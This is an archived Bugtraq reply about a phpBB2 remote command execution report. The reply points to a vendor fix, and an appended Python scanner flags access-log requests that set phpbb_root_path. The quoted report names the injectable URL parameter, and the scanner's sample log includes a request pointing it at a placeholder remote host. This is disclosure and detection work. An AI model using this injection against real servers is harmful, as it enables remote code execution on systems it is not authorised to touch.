[24737] in bugtraq


Re: phpBB2 remote execution command (fwd)

daemon@ATHENA.MIT.EDU (Jose Romeo Vela)
Mon Mar 18 23:25:24 2002

Date: Mon, 18 Mar 2002 20:17:42 -0500 (EST)
From: Jose Romeo Vela <jrvela@aristasol.com>
To: <bugtraq@securityfocus.com>
Cc: <vuln-dev@securityfocus.com>, <nullbyte@inetd-secure.net>
Message-ID: <Pine.LNX.4.33.0203182010520.12002-100000@la-sirena.aristasol.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


--- nullbyte <nullbyte@inetd-secure.net> wrote:
> phpBB2 is vulnerable to remote execution command
>
> All *nix running phpBB2 version 2.0.
>
> Bug could be found at "phpBB2 root path" which is allowed remote attacker
> to execute any command remotely.
> The vulnerability of this attack start with
> '/phpBB2/includes/db.php?phpbb_root_path=' but some backdoor server
> are needed to launch the attack.
>
> I did not look further into this bug.
> It is tested on most *nix systems running phpBB2 version 2.0.
> Probably all versions.
>
> Bug was found by pokley and nullbyte
>
> nullbyte
> nullbyte@inetd-secure.net
>

This bug only affects non-CVS versions. There is a fix available. For
details see:

http://phpbb.sourceforge.net/phpBB2/viewtopic.php?t=9105


---------------------------------------------------------------------
Jose Romeo Vela
jrvela@aristasol.com
http://www.aristasol.com/
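
Added example, not part of the original message or of phpBB: one way to review web server access logs for requests that set phpbb_root_path as a query parameter, the pattern named in the quoted report. It assumes Apache-style "combined" log lines; the log lines, addresses and host name are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address, request target and status from a "combined" access-log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A value starting with scheme:// or // points the include path off-host.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//', re.I)
PARAM = "phpbb_root_path"

# Constructed sample lines (documentation address ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Mar/2002:20:01:11 -0500] '
    '"GET /phpBB2/viewtopic.php?t=9105 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [18/Mar/2002:20:02:40 -0500] '
    '"GET /phpBB2/includes/db.php?phpbb_root_path=http://host.example.test/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [18/Mar/2002:20:02:58 -0500] '
    '"GET /phpBB2/includes/db.php?%70hpbb_root_path=../ HTTP/1.0" 200 0',
]


def php_name(key):
    """PHP converts dots and spaces in incoming variable names to underscores."""
    return key.replace(".", "_").replace(" ", "_")


def classify(line):
    """Return a finding dict if the request sets phpbb_root_path, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes names and values before they are compared.
    values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
              if php_name(k) == PARAM]
    if not values:
        return None
    remote = any(REMOTE_RE.match(v.strip()) for v in values)
    return {"ip": m.group("ip"), "path": parts.path,
            "status": int(m.group("status")),
            "severity": "high" if remote else "medium"}


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "high" finding means the parameter value names another host; "medium" means the parameter was supplied at all, which a normal board request has no reason to do.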




